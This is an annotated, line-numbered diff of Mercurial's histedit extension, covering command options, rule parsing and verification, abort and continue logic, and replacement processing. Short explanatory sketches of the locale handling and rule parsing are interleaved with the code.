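The hunk above drops the unconditional locale.setlocale(locale.LC_ALL, '') call and instead wraps the curses session in util.with_lc_ctype(), so only the character-type locale category follows the user's environment while ncurses is on screen. The helper itself is outside this diff; a rough sketch of what such a context manager could look like, as an assumption rather than Mercurial's actual implementation::

    import contextlib
    import locale

    @contextlib.contextmanager
    def with_lc_ctype():
        # Remember the current LC_CTYPE so it can be restored afterwards.
        oldloc = locale.setlocale(locale.LC_CTYPE, None)
        try:
            # Take only LC_CTYPE from the environment so ncurses renders
            # non-ASCII characters correctly, without touching LC_ALL.
            locale.setlocale(locale.LC_CTYPE, '')
            yield
        finally:
            locale.setlocale(locale.LC_CTYPE, oldloc)

    # Usage mirrors the call site above:
    #     with with_lc_ctype():
    #         rc = curses.wrapper(main)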
1735 1731
1736 1732 @command(
1737 1733 b'histedit',
1738 1734 [
1739 1735 (
1740 1736 b'',
1741 1737 b'commands',
1742 1738 b'',
1743 1739 _(b'read history edits from the specified file'),
1744 1740 _(b'FILE'),
1745 1741 ),
1746 1742 (b'c', b'continue', False, _(b'continue an edit already in progress')),
1747 1743 (b'', b'edit-plan', False, _(b'edit remaining actions list')),
1748 1744 (
1749 1745 b'k',
1750 1746 b'keep',
1751 1747 False,
1752 1748 _(b"don't strip old nodes after edit is complete"),
1753 1749 ),
1754 1750 (b'', b'abort', False, _(b'abort an edit in progress')),
1755 1751 (b'o', b'outgoing', False, _(b'changesets not found in destination')),
1756 1752 (
1757 1753 b'f',
1758 1754 b'force',
1759 1755 False,
1760 1756 _(b'force outgoing even for unrelated repositories'),
1761 1757 ),
1762 1758 (b'r', b'rev', [], _(b'first revision to be edited'), _(b'REV')),
1763 1759 ]
1764 1760 + cmdutil.formatteropts,
1765 1761 _(b"[OPTIONS] ([ANCESTOR] | --outgoing [URL])"),
1766 1762 helpcategory=command.CATEGORY_CHANGE_MANAGEMENT,
1767 1763 )
1768 1764 def histedit(ui, repo, *freeargs, **opts):
1769 1765 """interactively edit changeset history
1770 1766
1771 1767 This command lets you edit a linear series of changesets (up to
1772 1768 and including the working directory, which should be clean).
1773 1769 You can:
1774 1770
1775 1771 - `pick` to [re]order a changeset
1776 1772
1777 1773 - `drop` to omit a changeset
1778 1774
1779 1775 - `mess` to reword the changeset commit message
1780 1776
1781 1777 - `fold` to combine it with the preceding changeset (using the later date)
1782 1778
1783 1779 - `roll` like fold, but discarding this commit's description and date
1784 1780
1785 1781 - `edit` to edit this changeset (preserving date)
1786 1782
1787 1783 - `base` to checkout changeset and apply further changesets from there
1788 1784
1789 1785 There are a number of ways to select the root changeset:
1790 1786
1791 1787 - Specify ANCESTOR directly
1792 1788
1793 1789 - Use --outgoing -- it will be the first linear changeset not
1794 1790 included in destination. (See :hg:`help config.paths.default-push`)
1795 1791
1796 1792 - Otherwise, the value from the "histedit.defaultrev" config option
1797 1793 is used as a revset to select the base revision when ANCESTOR is not
1798 1794 specified. The first revision returned by the revset is used. By
1799 1795 default, this selects the editable history that is unique to the
1800 1796 ancestry of the working directory.
1801 1797
1802 1798 .. container:: verbose
1803 1799
1804 1800 If you use --outgoing, this command will abort if there are ambiguous
1805 1801 outgoing revisions. For example, if there are multiple branches
1806 1802 containing outgoing revisions.
1807 1803
1808 1804 Use "min(outgoing() and ::.)" or similar revset specification
1809 1805 instead of --outgoing to specify edit target revision exactly in
1810 1806 such ambiguous situation. See :hg:`help revsets` for detail about
1811 1807 selecting revisions.
1812 1808
1813 1809 .. container:: verbose
1814 1810
1815 1811 Examples:
1816 1812
1817 1813 - A number of changes have been made.
1818 1814 Revision 3 is no longer needed.
1819 1815
1820 1816 Start history editing from revision 3::
1821 1817
1822 1818 hg histedit -r 3
1823 1819
1824 1820 An editor opens, containing the list of revisions,
1825 1821 with specific actions specified::
1826 1822
1827 1823 pick 5339bf82f0ca 3 Zworgle the foobar
1828 1824 pick 8ef592ce7cc4 4 Bedazzle the zerlog
1829 1825 pick 0a9639fcda9d 5 Morgify the cromulancy
1830 1826
1831 1827 Additional information about the possible actions
1832 1828 to take appears below the list of revisions.
1833 1829
1834 1830 To remove revision 3 from the history,
1835 1831 its action (at the beginning of the relevant line)
1836 1832 is changed to 'drop'::
1837 1833
1838 1834 drop 5339bf82f0ca 3 Zworgle the foobar
1839 1835 pick 8ef592ce7cc4 4 Bedazzle the zerlog
1840 1836 pick 0a9639fcda9d 5 Morgify the cromulancy
1841 1837
1842 1838 - A number of changes have been made.
1843 1839 Revisions 2 and 4 need to be swapped.
1844 1840
1845 1841 Start history editing from revision 2::
1846 1842
1847 1843 hg histedit -r 2
1848 1844
1849 1845 An editor opens, containing the list of revisions,
1850 1846 with specific actions specified::
1851 1847
1852 1848 pick 252a1af424ad 2 Blorb a morgwazzle
1853 1849 pick 5339bf82f0ca 3 Zworgle the foobar
1854 1850 pick 8ef592ce7cc4 4 Bedazzle the zerlog
1855 1851
1856 1852 To swap revisions 2 and 4, their lines are swapped
1857 1853 in the editor::
1858 1854
1859 1855 pick 8ef592ce7cc4 4 Bedazzle the zerlog
1860 1856 pick 5339bf82f0ca 3 Zworgle the foobar
1861 1857 pick 252a1af424ad 2 Blorb a morgwazzle
1862 1858
1863 1859 Returns 0 on success, 1 if user intervention is required (not only
1864 1860 for intentional "edit" command, but also for resolving unexpected
1865 1861 conflicts).
1866 1862 """
1867 1863 opts = pycompat.byteskwargs(opts)
1868 1864
1869 1865 # kludge: _chistedit only works for starting an edit, not aborting
1870 1866 # or continuing, so fall back to regular _texthistedit for those
1871 1867 # operations.
1872 1868 if ui.interface(b'histedit') == b'curses' and _getgoal(opts) == goalnew:
1873 1869 return _chistedit(ui, repo, freeargs, opts)
1874 1870 return _texthistedit(ui, repo, freeargs, opts)
1875 1871
1876 1872
1877 1873 def _texthistedit(ui, repo, freeargs, opts):
1878 1874 state = histeditstate(repo)
1879 1875 with repo.wlock() as wlock, repo.lock() as lock:
1880 1876 state.wlock = wlock
1881 1877 state.lock = lock
1882 1878 _histedit(ui, repo, state, freeargs, opts)
1883 1879
1884 1880
1885 1881 goalcontinue = b'continue'
1886 1882 goalabort = b'abort'
1887 1883 goaleditplan = b'edit-plan'
1888 1884 goalnew = b'new'
1889 1885
1890 1886
1891 1887 def _getgoal(opts):
1892 1888 if opts.get(b'continue'):
1893 1889 return goalcontinue
1894 1890 if opts.get(b'abort'):
1895 1891 return goalabort
1896 1892 if opts.get(b'edit_plan'):
1897 1893 return goaleditplan
1898 1894 return goalnew
1899 1895
1900 1896
1901 1897 def _readfile(ui, path):
1902 1898 if path == b'-':
1903 1899 with ui.timeblockedsection(b'histedit'):
1904 1900 return ui.fin.read()
1905 1901 else:
1906 1902 with open(path, b'rb') as f:
1907 1903 return f.read()
1908 1904
1909 1905
1910 1906 def _validateargs(ui, repo, state, freeargs, opts, goal, rules, revs):
1911 1907 # TODO only abort if we try to histedit mq patches, not just
1912 1908 # blanket if mq patches are applied somewhere
1913 1909 mq = getattr(repo, 'mq', None)
1914 1910 if mq and mq.applied:
1915 1911 raise error.Abort(_(b'source has mq patches applied'))
1916 1912
1917 1913 # basic argument incompatibility processing
1918 1914 outg = opts.get(b'outgoing')
1919 1915 editplan = opts.get(b'edit_plan')
1920 1916 abort = opts.get(b'abort')
1921 1917 force = opts.get(b'force')
1922 1918 if force and not outg:
1923 1919 raise error.Abort(_(b'--force only allowed with --outgoing'))
1924 1920 if goal == b'continue':
1925 1921 if any((outg, abort, revs, freeargs, rules, editplan)):
1926 1922 raise error.Abort(_(b'no arguments allowed with --continue'))
1927 1923 elif goal == b'abort':
1928 1924 if any((outg, revs, freeargs, rules, editplan)):
1929 1925 raise error.Abort(_(b'no arguments allowed with --abort'))
1930 1926 elif goal == b'edit-plan':
1931 1927 if any((outg, revs, freeargs)):
1932 1928 raise error.Abort(
1933 1929 _(b'only --commands argument allowed with --edit-plan')
1934 1930 )
1935 1931 else:
1936 1932 if state.inprogress():
1937 1933 raise error.Abort(
1938 1934 _(
1939 1935 b'history edit already in progress, try '
1940 1936 b'--continue or --abort'
1941 1937 )
1942 1938 )
1943 1939 if outg:
1944 1940 if revs:
1945 1941 raise error.Abort(_(b'no revisions allowed with --outgoing'))
1946 1942 if len(freeargs) > 1:
1947 1943 raise error.Abort(
1948 1944 _(b'only one repo argument allowed with --outgoing')
1949 1945 )
1950 1946 else:
1951 1947 revs.extend(freeargs)
1952 1948 if len(revs) == 0:
1953 1949 defaultrev = destutil.desthistedit(ui, repo)
1954 1950 if defaultrev is not None:
1955 1951 revs.append(defaultrev)
1956 1952
1957 1953 if len(revs) != 1:
1958 1954 raise error.Abort(
1959 1955 _(b'histedit requires exactly one ancestor revision')
1960 1956 )
1961 1957
1962 1958
1963 1959 def _histedit(ui, repo, state, freeargs, opts):
1964 1960 fm = ui.formatter(b'histedit', opts)
1965 1961 fm.startitem()
1966 1962 goal = _getgoal(opts)
1967 1963 revs = opts.get(b'rev', [])
1968 1964 nobackup = not ui.configbool(b'rewrite', b'backup-bundle')
1969 1965 rules = opts.get(b'commands', b'')
1970 1966 state.keep = opts.get(b'keep', False)
1971 1967
1972 1968 _validateargs(ui, repo, state, freeargs, opts, goal, rules, revs)
1973 1969
1974 1970 hastags = False
1975 1971 if revs:
1976 1972 revs = scmutil.revrange(repo, revs)
1977 1973 ctxs = [repo[rev] for rev in revs]
1978 1974 for ctx in ctxs:
1979 1975 tags = [tag for tag in ctx.tags() if tag != b'tip']
1980 1976 if not hastags:
1981 1977 hastags = len(tags)
1982 1978 if hastags:
1983 1979 if ui.promptchoice(
1984 1980 _(
1985 1981 b'warning: tags associated with the given'
1986 1982 b' changeset will be lost after histedit.\n'
1987 1983 b'do you want to continue (yN)? $$ &Yes $$ &No'
1988 1984 ),
1989 1985 default=1,
1990 1986 ):
1991 1987 raise error.Abort(_(b'histedit cancelled\n'))
1992 1988 # rebuild state
1993 1989 if goal == goalcontinue:
1994 1990 state.read()
1995 1991 state = bootstrapcontinue(ui, state, opts)
1996 1992 elif goal == goaleditplan:
1997 1993 _edithisteditplan(ui, repo, state, rules)
1998 1994 return
1999 1995 elif goal == goalabort:
2000 1996 _aborthistedit(ui, repo, state, nobackup=nobackup)
2001 1997 return
2002 1998 else:
2003 1999 # goal == goalnew
2004 2000 _newhistedit(ui, repo, state, revs, freeargs, opts)
2005 2001
2006 2002 _continuehistedit(ui, repo, state)
2007 2003 _finishhistedit(ui, repo, state, fm)
2008 2004 fm.end()
2009 2005
2010 2006
2011 2007 def _continuehistedit(ui, repo, state):
2012 2008 """This function runs after either:
2013 2009 - bootstrapcontinue (if the goal is 'continue')
2014 2010 - _newhistedit (if the goal is 'new')
2015 2011 """
2016 2012 # preprocess rules so that we can hide inner folds from the user
2017 2013 # and only show one editor
2018 2014 actions = state.actions[:]
2019 2015 for idx, (action, nextact) in enumerate(zip(actions, actions[1:] + [None])):
2020 2016 if action.verb == b'fold' and nextact and nextact.verb == b'fold':
2021 2017 state.actions[idx].__class__ = _multifold
2022 2018
2023 2019 # Force an initial state file write, so the user can run --abort/continue
2024 2020 # even if there's an exception before the first transaction serialize.
2025 2021 state.write()
2026 2022
2027 2023 tr = None
2028 2024 # Don't use singletransaction by default since it rolls the entire
2029 2025 # transaction back if an unexpected exception happens (like a
2030 2026 # pretxncommit hook throws, or the user aborts the commit msg editor).
2031 2027 if ui.configbool(b"histedit", b"singletransaction"):
2032 2028 # Don't use a 'with' for the transaction, since actions may close
2033 2029 # and reopen a transaction. For example, if the action executes an
2034 2030 # external process it may choose to commit the transaction first.
2035 2031 tr = repo.transaction(b'histedit')
2036 2032 progress = ui.makeprogress(
2037 2033 _(b"editing"), unit=_(b'changes'), total=len(state.actions)
2038 2034 )
2039 2035 with progress, util.acceptintervention(tr):
2040 2036 while state.actions:
2041 2037 state.write(tr=tr)
2042 2038 actobj = state.actions[0]
2043 2039 progress.increment(item=actobj.torule())
2044 2040 ui.debug(
2045 2041 b'histedit: processing %s %s\n' % (actobj.verb, actobj.torule())
2046 2042 )
2047 2043 parentctx, replacement_ = actobj.run()
2048 2044 state.parentctxnode = parentctx.node()
2049 2045 state.replacements.extend(replacement_)
2050 2046 state.actions.pop(0)
2051 2047
2052 2048 state.write()
2053 2049
2054 2050
2055 2051 def _finishhistedit(ui, repo, state, fm):
2056 2052 """This action runs when histedit is finishing its session"""
2057 2053 hg.updaterepo(repo, state.parentctxnode, overwrite=False)
2058 2054
2059 2055 mapping, tmpnodes, created, ntm = processreplacement(state)
2060 2056 if mapping:
2061 2057 for prec, succs in pycompat.iteritems(mapping):
2062 2058 if not succs:
2063 2059 ui.debug(b'histedit: %s is dropped\n' % node.short(prec))
2064 2060 else:
2065 2061 ui.debug(
2066 2062 b'histedit: %s is replaced by %s\n'
2067 2063 % (node.short(prec), node.short(succs[0]))
2068 2064 )
2069 2065 if len(succs) > 1:
2070 2066 m = b'histedit: %s'
2071 2067 for n in succs[1:]:
2072 2068 ui.debug(m % node.short(n))
2073 2069
2074 2070 if not state.keep:
2075 2071 if mapping:
2076 2072 movetopmostbookmarks(repo, state.topmost, ntm)
2077 2073 # TODO update mq state
2078 2074 else:
2079 2075 mapping = {}
2080 2076
2081 2077 for n in tmpnodes:
2082 2078 if n in repo:
2083 2079 mapping[n] = ()
2084 2080
2085 2081 # remove entries about unknown nodes
2086 2082 has_node = repo.unfiltered().changelog.index.has_node
2087 2083 mapping = {
2088 2084 k: v
2089 2085 for k, v in mapping.items()
2090 2086 if has_node(k) and all(has_node(n) for n in v)
2091 2087 }
2092 2088 scmutil.cleanupnodes(repo, mapping, b'histedit')
2093 2089 hf = fm.hexfunc
2094 2090 fl = fm.formatlist
2095 2091 fd = fm.formatdict
2096 2092 nodechanges = fd(
2097 2093 {
2098 2094 hf(oldn): fl([hf(n) for n in newn], name=b'node')
2099 2095 for oldn, newn in pycompat.iteritems(mapping)
2100 2096 },
2101 2097 key=b"oldnode",
2102 2098 value=b"newnodes",
2103 2099 )
2104 2100 fm.data(nodechanges=nodechanges)
2105 2101
2106 2102 state.clear()
2107 2103 if os.path.exists(repo.sjoin(b'undo')):
2108 2104 os.unlink(repo.sjoin(b'undo'))
2109 2105 if repo.vfs.exists(b'histedit-last-edit.txt'):
2110 2106 repo.vfs.unlink(b'histedit-last-edit.txt')
2111 2107
2112 2108
2113 2109 def _aborthistedit(ui, repo, state, nobackup=False):
2114 2110 try:
2115 2111 state.read()
2116 2112 __, leafs, tmpnodes, __ = processreplacement(state)
2117 2113 ui.debug(b'restore wc to old parent %s\n' % node.short(state.topmost))
2118 2114
2119 2115 # Recover our old commits if necessary
2120 2116 if not state.topmost in repo and state.backupfile:
2121 2117 backupfile = repo.vfs.join(state.backupfile)
2122 2118 f = hg.openpath(ui, backupfile)
2123 2119 gen = exchange.readbundle(ui, f, backupfile)
2124 2120 with repo.transaction(b'histedit.abort') as tr:
2125 2121 bundle2.applybundle(
2126 2122 repo,
2127 2123 gen,
2128 2124 tr,
2129 2125 source=b'histedit',
2130 2126 url=b'bundle:' + backupfile,
2131 2127 )
2132 2128
2133 2129 os.remove(backupfile)
2134 2130
2135 2131 # check whether we should update away
2136 2132 if repo.unfiltered().revs(
2137 2133 b'parents() and (%n or %ln::)',
2138 2134 state.parentctxnode,
2139 2135 leafs | tmpnodes,
2140 2136 ):
2141 2137 hg.clean(repo, state.topmost, show_stats=True, quietempty=True)
2142 2138 cleanupnode(ui, repo, tmpnodes, nobackup=nobackup)
2143 2139 cleanupnode(ui, repo, leafs, nobackup=nobackup)
2144 2140 except Exception:
2145 2141 if state.inprogress():
2146 2142 ui.warn(
2147 2143 _(
2148 2144 b'warning: encountered an exception during histedit '
2149 2145 b'--abort; the repository may not have been completely '
2150 2146 b'cleaned up\n'
2151 2147 )
2152 2148 )
2153 2149 raise
2154 2150 finally:
2155 2151 state.clear()
2156 2152
2157 2153
2158 2154 def hgaborthistedit(ui, repo):
2159 2155 state = histeditstate(repo)
2160 2156 nobackup = not ui.configbool(b'rewrite', b'backup-bundle')
2161 2157 with repo.wlock() as wlock, repo.lock() as lock:
2162 2158 state.wlock = wlock
2163 2159 state.lock = lock
2164 2160 _aborthistedit(ui, repo, state, nobackup=nobackup)
2165 2161
2166 2162
2167 2163 def _edithisteditplan(ui, repo, state, rules):
2168 2164 state.read()
2169 2165 if not rules:
2170 2166 comment = geteditcomment(
2171 2167 ui, node.short(state.parentctxnode), node.short(state.topmost)
2172 2168 )
2173 2169 rules = ruleeditor(repo, ui, state.actions, comment)
2174 2170 else:
2175 2171 rules = _readfile(ui, rules)
2176 2172 actions = parserules(rules, state)
2177 2173 ctxs = [repo[act.node] for act in state.actions if act.node]
2178 2174 warnverifyactions(ui, repo, actions, state, ctxs)
2179 2175 state.actions = actions
2180 2176 state.write()
2181 2177
2182 2178
2183 2179 def _newhistedit(ui, repo, state, revs, freeargs, opts):
2184 2180 outg = opts.get(b'outgoing')
2185 2181 rules = opts.get(b'commands', b'')
2186 2182 force = opts.get(b'force')
2187 2183
2188 2184 cmdutil.checkunfinished(repo)
2189 2185 cmdutil.bailifchanged(repo)
2190 2186
2191 2187 topmost = repo.dirstate.p1()
2192 2188 if outg:
2193 2189 if freeargs:
2194 2190 remote = freeargs[0]
2195 2191 else:
2196 2192 remote = None
2197 2193 root = findoutgoing(ui, repo, remote, force, opts)
2198 2194 else:
2199 2195 rr = list(repo.set(b'roots(%ld)', scmutil.revrange(repo, revs)))
2200 2196 if len(rr) != 1:
2201 2197 raise error.Abort(
2202 2198 _(
2203 2199 b'The specified revisions must have '
2204 2200 b'exactly one common root'
2205 2201 )
2206 2202 )
2207 2203 root = rr[0].node()
2208 2204
2209 2205 revs = between(repo, root, topmost, state.keep)
2210 2206 if not revs:
2211 2207 raise error.Abort(
2212 2208 _(b'%s is not an ancestor of working directory') % node.short(root)
2213 2209 )
2214 2210
2215 2211 ctxs = [repo[r] for r in revs]
2216 2212
2217 2213 wctx = repo[None]
2218 2214 # Please don't ask me why `ancestors` is this value. I figured it
2219 2215 # out with print-debugging, not by actually understanding what the
2220 2216 # merge code is doing. :(
2221 2217 ancs = [repo[b'.']]
2222 2218 # Sniff-test to make sure we won't collide with untracked files in
2223 2219 # the working directory. If we don't do this, we can get a
2224 2220 # collision after we've started histedit and backing out gets ugly
2225 2221 # for everyone, especially the user.
2226 2222 for c in [ctxs[0].p1()] + ctxs:
2227 2223 try:
2228 2224 mergemod.calculateupdates(
2229 2225 repo,
2230 2226 wctx,
2231 2227 c,
2232 2228 ancs,
2233 2229 # These parameters were determined by print-debugging
2234 2230 # what happens later on inside histedit.
2235 2231 branchmerge=False,
2236 2232 force=False,
2237 2233 acceptremote=False,
2238 2234 followcopies=False,
2239 2235 )
2240 2236 except error.Abort:
2241 2237 raise error.Abort(
2242 2238 _(
2243 2239 b"untracked files in working directory conflict with files in %s"
2244 2240 )
2245 2241 % c
2246 2242 )
2247 2243
2248 2244 if not rules:
2249 2245 comment = geteditcomment(ui, node.short(root), node.short(topmost))
2250 2246 actions = [pick(state, r) for r in revs]
2251 2247 rules = ruleeditor(repo, ui, actions, comment)
2252 2248 else:
2253 2249 rules = _readfile(ui, rules)
2254 2250 actions = parserules(rules, state)
2255 2251 warnverifyactions(ui, repo, actions, state, ctxs)
2256 2252
2257 2253 parentctxnode = repo[root].p1().node()
2258 2254
2259 2255 state.parentctxnode = parentctxnode
2260 2256 state.actions = actions
2261 2257 state.topmost = topmost
2262 2258 state.replacements = []
2263 2259
2264 2260 ui.log(
2265 2261 b"histedit",
2266 2262 b"%d actions to histedit\n",
2267 2263 len(actions),
2268 2264 histedit_num_actions=len(actions),
2269 2265 )
2270 2266
2271 2267 # Create a backup so we can always abort completely.
2272 2268 backupfile = None
2273 2269 if not obsolete.isenabled(repo, obsolete.createmarkersopt):
2274 2270 backupfile = repair.backupbundle(
2275 2271 repo, [parentctxnode], [topmost], root, b'histedit'
2276 2272 )
2277 2273 state.backupfile = backupfile
2278 2274
2279 2275
2280 2276 def _getsummary(ctx):
2281 2277 # a common pattern is to extract the summary but default to the empty
2282 2278 # string
2283 2279 summary = ctx.description() or b''
2284 2280 if summary:
2285 2281 summary = summary.splitlines()[0]
2286 2282 return summary
2287 2283
2288 2284
2289 2285 def bootstrapcontinue(ui, state, opts):
2290 2286 repo = state.repo
2291 2287
2292 2288 ms = mergemod.mergestate.read(repo)
2293 2289 mergeutil.checkunresolved(ms)
2294 2290
2295 2291 if state.actions:
2296 2292 actobj = state.actions.pop(0)
2297 2293
2298 2294 if _isdirtywc(repo):
2299 2295 actobj.continuedirty()
2300 2296 if _isdirtywc(repo):
2301 2297 abortdirty()
2302 2298
2303 2299 parentctx, replacements = actobj.continueclean()
2304 2300
2305 2301 state.parentctxnode = parentctx.node()
2306 2302 state.replacements.extend(replacements)
2307 2303
2308 2304 return state
2309 2305
2310 2306
2311 2307 def between(repo, old, new, keep):
2312 2308 """select and validate the set of revision to edit
2313 2309
2314 2310 When keep is false, the specified set can't have children."""
2315 2311 revs = repo.revs(b'%n::%n', old, new)
2316 2312 if revs and not keep:
2317 2313 rewriteutil.precheck(repo, revs, b'edit')
2318 2314 if repo.revs(b'(%ld) and merge()', revs):
2319 2315 raise error.Abort(_(b'cannot edit history that contains merges'))
2320 2316 return pycompat.maplist(repo.changelog.node, revs)
2321 2317
2322 2318
2323 2319 def ruleeditor(repo, ui, actions, editcomment=b""):
2324 2320 """open an editor to edit rules
2325 2321
2326 2322 rules are in the format [ [act, ctx], ...] like in state.rules
2327 2323 """
2328 2324 if repo.ui.configbool(b"experimental", b"histedit.autoverb"):
2329 2325 newact = util.sortdict()
2330 2326 for act in actions:
2331 2327 ctx = repo[act.node]
2332 2328 summary = _getsummary(ctx)
2333 2329 fword = summary.split(b' ', 1)[0].lower()
2334 2330 added = False
2335 2331
2336 2332 # if it doesn't end with the special character '!' just skip this
2337 2333 if fword.endswith(b'!'):
2338 2334 fword = fword[:-1]
2339 2335 if fword in primaryactions | secondaryactions | tertiaryactions:
2340 2336 act.verb = fword
2341 2337 # get the target summary
2342 2338 tsum = summary[len(fword) + 1 :].lstrip()
2343 2339 # safe but slow: reverse iterate over the actions so we
2344 2340 # don't clash on two commits having the same summary
2345 2341 for na, l in reversed(list(pycompat.iteritems(newact))):
2346 2342 actx = repo[na.node]
2347 2343 asum = _getsummary(actx)
2348 2344 if asum == tsum:
2349 2345 added = True
2350 2346 l.append(act)
2351 2347 break
2352 2348
2353 2349 if not added:
2354 2350 newact[act] = []
2355 2351
2356 2352 # copy over and flatten the new list
2357 2353 actions = []
2358 2354 for na, l in pycompat.iteritems(newact):
2359 2355 actions.append(na)
2360 2356 actions += l
2361 2357
2362 2358 rules = b'\n'.join([act.torule() for act in actions])
2363 2359 rules += b'\n\n'
2364 2360 rules += editcomment
2365 2361 rules = ui.edit(
2366 2362 rules,
2367 2363 ui.username(),
2368 2364 {b'prefix': b'histedit'},
2369 2365 repopath=repo.path,
2370 2366 action=b'histedit',
2371 2367 )
2372 2368
2373 2369 # Save edit rules in .hg/histedit-last-edit.txt in case
2374 2370 # the user needs to ask for help after something
2375 2371 # surprising happens.
2376 2372 with repo.vfs(b'histedit-last-edit.txt', b'wb') as f:
2377 2373 f.write(rules)
2378 2374
2379 2375 return rules
2380 2376
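When experimental.histedit.autoverb is enabled, ruleeditor treats a commit summary whose first word ends in '!' and names a known action as an instruction: that word becomes the verb and the rest of the summary is matched against an earlier commit's summary so the action is queued right after it. A standalone sketch of just the first-word parsing step, with an invented verb set and summaries::

    def parse_autoverb(summary, known_verbs):
        """Return (verb, target_summary) if the summary requests an action,
        otherwise (None, summary)."""
        fword = summary.split(b' ', 1)[0].lower()
        if fword.endswith(b'!'):
            fword = fword[:-1]
            if fword in known_verbs:
                # The remainder names the commit this action should follow.
                return fword, summary[len(fword) + 1:].lstrip()
        return None, summary

    verbs = {b'pick', b'fold', b'roll', b'drop', b'mess', b'edit', b'base'}
    print(parse_autoverb(b'fold! Add gamma', verbs))  # (b'fold', b'Add gamma')
    print(parse_autoverb(b'Add delta', verbs))        # (None, b'Add delta')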
2381 2377
2382 2378 def parserules(rules, state):
2383 2379 """Read the histedit rules string and return list of action objects """
2384 2380 rules = [
2385 2381 l
2386 2382 for l in (r.strip() for r in rules.splitlines())
2387 2383 if l and not l.startswith(b'#')
2388 2384 ]
2389 2385 actions = []
2390 2386 for r in rules:
2391 2387 if b' ' not in r:
2392 2388 raise error.ParseError(_(b'malformed line "%s"') % r)
2393 2389 verb, rest = r.split(b' ', 1)
2394 2390
2395 2391 if verb not in actiontable:
2396 2392 raise error.ParseError(_(b'unknown action "%s"') % verb)
2397 2393
2398 2394 action = actiontable[verb].fromrule(state, rest)
2399 2395 actions.append(action)
2400 2396 return actions
2401 2397
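parserules skips blank and '#' lines and splits every remaining line into a verb and its argument, rejecting malformed lines and unknown verbs. A minimal standalone version of that parsing, with an illustrative verb table and rules blob (the real verbs live in actiontable)::

    KNOWN_VERBS = {b'pick', b'edit', b'fold', b'roll', b'drop', b'mess', b'base'}

    def parse_rules(rules):
        """Return a list of (verb, rest) tuples from a histedit-style blob."""
        actions = []
        for line in rules.splitlines():
            line = line.strip()
            if not line or line.startswith(b'#'):
                continue
            if b' ' not in line:
                raise ValueError('malformed line %r' % line)
            verb, rest = line.split(b' ', 1)
            if verb not in KNOWN_VERBS:
                raise ValueError('unknown action %r' % verb)
            actions.append((verb, rest))
        return actions

    sample = (b"# comment lines are skipped\n"
              b"pick 5339bf82f0ca Zworgle the foobar\n"
              b"fold 8ef592ce7cc4 Bedazzle the zerlog\n")
    print(parse_rules(sample))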
2402 2398
2403 2399 def warnverifyactions(ui, repo, actions, state, ctxs):
2404 2400 try:
2405 2401 verifyactions(actions, state, ctxs)
2406 2402 except error.ParseError:
2407 2403 if repo.vfs.exists(b'histedit-last-edit.txt'):
2408 2404 ui.warn(
2409 2405 _(
2410 2406 b'warning: histedit rules saved '
2411 2407 b'to: .hg/histedit-last-edit.txt\n'
2412 2408 )
2413 2409 )
2414 2410 raise
2415 2411
2416 2412
2417 2413 def verifyactions(actions, state, ctxs):
2418 2414 """Verify that there exists exactly one action per given changeset and
2419 2415 other constraints.
2420 2416
2421 2417 Will abort if there are too many or too few rules, a malformed rule,
2422 2418 or a rule on a changeset outside of the user-given range.
2423 2419 """
2424 2420 expected = {c.node() for c in ctxs}
2425 2421 seen = set()
2426 2422 prev = None
2427 2423
2428 2424 if actions and actions[0].verb in [b'roll', b'fold']:
2429 2425 raise error.ParseError(
2430 2426 _(b'first changeset cannot use verb "%s"') % actions[0].verb
2431 2427 )
2432 2428
2433 2429 for action in actions:
2434 2430 action.verify(prev, expected, seen)
2435 2431 prev = action
2436 2432 if action.node is not None:
2437 2433 seen.add(action.node)
2438 2434 missing = sorted(expected - seen) # sort to stabilize output
2439 2435
2440 2436 if state.repo.ui.configbool(b'histedit', b'dropmissing'):
2441 2437 if len(actions) == 0:
2442 2438 raise error.ParseError(
2443 2439 _(b'no rules provided'),
2444 2440 hint=_(b'use strip extension to remove commits'),
2445 2441 )
2446 2442
2447 2443 drops = [drop(state, n) for n in missing]
2448 2444 # put them at the beginning so they execute immediately and
2449 2445 # don't show in the edit-plan in the future
2450 2446 actions[:0] = drops
2451 2447 elif missing:
2452 2448 raise error.ParseError(
2453 2449 _(b'missing rules for changeset %s') % node.short(missing[0]),
2454 2450 hint=_(
2455 2451 b'use "drop %s" to discard, see also: '
2456 2452 b"'hg help -e histedit.config'"
2457 2453 )
2458 2454 % node.short(missing[0]),
2459 2455 )
2460 2456
2461 2457
2462 2458 def adjustreplacementsfrommarkers(repo, oldreplacements):
2463 2459 """Adjust replacements from obsolescence markers
2464 2460
2465 2461 Replacements structure is originally generated based on
2466 2462 histedit's state and does not account for changes that are
2467 2463 not recorded there. This function fixes that by adding
2468 2464 data read from obsolescence markers"""
2469 2465 if not obsolete.isenabled(repo, obsolete.createmarkersopt):
2470 2466 return oldreplacements
2471 2467
2472 2468 unfi = repo.unfiltered()
2473 2469 get_rev = unfi.changelog.index.get_rev
2474 2470 obsstore = repo.obsstore
2475 2471 newreplacements = list(oldreplacements)
2476 2472 oldsuccs = [r[1] for r in oldreplacements]
2477 2473 # successors that have already been added to succstocheck once
2478 2474 seensuccs = set().union(
2479 2475 *oldsuccs
2480 2476 ) # create a set from an iterable of tuples
2481 2477 succstocheck = list(seensuccs)
2482 2478 while succstocheck:
2483 2479 n = succstocheck.pop()
2484 2480 missing = get_rev(n) is None
2485 2481 markers = obsstore.successors.get(n, ())
2486 2482 if missing and not markers:
2487 2483 # dead end, mark it as such
2488 2484 newreplacements.append((n, ()))
2489 2485 for marker in markers:
2490 2486 nsuccs = marker[1]
2491 2487 newreplacements.append((n, nsuccs))
2492 2488 for nsucc in nsuccs:
2493 2489 if nsucc not in seensuccs:
2494 2490 seensuccs.add(nsucc)
2495 2491 succstocheck.append(nsucc)
2496 2492
2497 2493 return newreplacements
2498 2494
2499 2495
2500 2496 def processreplacement(state):
2501 2497 """process the list of replacements to return
2502 2498
2503 2499 1) the final mapping between original and created nodes
2504 2500 2) the list of temporary nodes created by histedit
2505 2501 3) the list of new commits created by histedit"""
2506 2502 replacements = adjustreplacementsfrommarkers(state.repo, state.replacements)
2507 2503 allsuccs = set()
2508 2504 replaced = set()
2509 2505 fullmapping = {}
2510 2506 # initialize basic set
2511 2507 # fullmapping records all operations recorded in replacement
2512 2508 for rep in replacements:
2513 2509 allsuccs.update(rep[1])
2514 2510 replaced.add(rep[0])
2515 2511 fullmapping.setdefault(rep[0], set()).update(rep[1])
2516 2512 new = allsuccs - replaced
2517 2513 tmpnodes = allsuccs & replaced
2518 2514 # Reduce fullmapping into a direct relation between the original nodes
2519 2515 # and the final nodes created during history editing.
2520 2516 # Dropped changesets are replaced by an empty list.
